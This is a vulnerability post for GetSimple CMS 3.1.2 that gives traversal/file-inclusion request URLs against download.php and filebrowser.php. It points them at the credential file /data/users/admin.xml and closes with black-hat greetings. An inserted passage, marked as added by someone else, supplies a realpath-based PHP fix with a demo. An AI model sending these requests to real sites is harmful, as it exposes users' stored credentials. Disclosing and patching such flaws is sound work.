===========================================================================
Author: PuN!Sh3r
Vulnerable Software: GetSimple CMS v 3.1.2
Official Site: http://get-simple.info/download/
===========================================================================

Hi to All..
We have a Path Disclosure Vulnerability...
You can access other users' credentials, because the CMS stores them in .xml files, not in MySQL. The user files are in /data/users/, for example /data/users/admin.xml. Each file contains the username, passwd, mail, etc.

1. http://localhost/cms/admin/download.php?file=[LFI]

If you want to check it:

http://localhost/cms/admin/download.php?file=download.php
------------------------------------------------------------
http://i062.radikal.ru/1208/b4/c0587b1841e5.jpg
------------------------------------------------------------

2. http://localhost/cms/admin/filebrowser.php?path=[LFI]

snippet:

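// Vulnerable: $_GET['path'] is appended to the uploads directory with no validation.
// The isset() guard is assumed; the excerpt lost the ternary condition.
$path = (isset($_GET['path'])) ? "../data/uploads/" . $_GET['path'] : "../data/uploads/";
$path = tsl ($path);
$filenames = getfiles ($path);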
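
A hardened form of the path handling above, as an added example (not GetSimple's code and not the author's): the request value is resolved with realpath() and accepted only if it stays under the uploads directory. The function name resolve_under_base and the temporary directory layout are assumptions made for the demonstration.

```php
<?php
// Added example (not GetSimple code): confine a user-supplied relative path
// to a base directory before it is opened or listed.
function resolve_under_base(string $base, string $userPath): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;                       // base directory missing
    }
    if (strpos($userPath, "\0") !== false) {
        return null;                       // reject NUL bytes outright
    }
    // realpath() collapses "..", "." and symlinks; it returns false if the target is absent.
    $target = realpath($baseReal . DIRECTORY_SEPARATOR . $userPath);
    if ($target === false) {
        return null;
    }
    // Accept the base itself or anything strictly below it. The trailing
    // separator stops ".../uploads_old" from matching ".../uploads".
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($target !== $baseReal && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed layout mirroring the advisory: data/uploads next to data/users/admin.xml
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'gs_demo_' . bin2hex(random_bytes(4));
mkdir("$root/data/uploads/img", 0700, true);
mkdir("$root/data/users", 0700, true);
mkdir("$root/data/uploads_old", 0700, true);
file_put_contents("$root/data/users/admin.xml", "<item/>");   // constructed sample
file_put_contents("$root/data/uploads/img/logo.png", "x");     // constructed sample
file_put_contents("$root/data/uploads_old/a.txt", "x");        // constructed sample

$base = "$root/data/uploads";
$inputs = ['img/logo.png', '', 'img/../img', '../users/admin.xml',
           '../uploads_old/a.txt', 'missing.txt'];
foreach ($inputs as $p) {
    $r = resolve_under_base($base, $p);
    printf("%-24s => %s\n", var_export($p, true), $r === null ? 'REJECTED' : 'ok');
}
```

The same check applies to the file parameter of download.php, with the base set to the directory that script is meant to serve from.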


Respect to All Azerbaijani BlackHatzzzz and Anti-armenia.org&Anti-armenia Team

Thank you!

./PuN!Sh3r